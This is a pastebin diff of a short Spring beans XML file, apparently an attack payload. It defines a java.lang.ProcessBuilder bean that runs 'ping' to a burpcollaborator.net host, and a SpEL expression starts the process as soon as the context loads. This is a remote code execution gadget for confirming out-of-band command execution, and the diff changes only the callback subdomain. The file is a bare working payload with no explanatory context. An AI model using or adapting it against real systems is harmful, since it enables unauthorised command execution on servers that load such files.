View difference between Paste ID: EZxrsjFw and CYvsdQXN
SHOW: | | - or go back to the newest paste.
1
<beans xmlns="http://www.springframework.org/schema/beans"
2
  xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
3
  xsi:schemaLocation="
4
     http://www.springframework.org/schema/beans
5
     http://www.springframework.org/schema/beans/spring-beans.xsd
6
">
7
  <bean id="pb" class="java.lang.ProcessBuilder">
8-
     <constructor-arg value="ping lj8un3tmyq9xym3opr6fwmk1gsmlaa.burpcollaborator.net" />
8+
     <constructor-arg value="ping rd811hc7kvheyence93ohmmygpmfa4.burpcollaborator.net" />
9
     <property name="whatever" value="#{ pb.start() }"/>
10
  </bean>
11
</beans>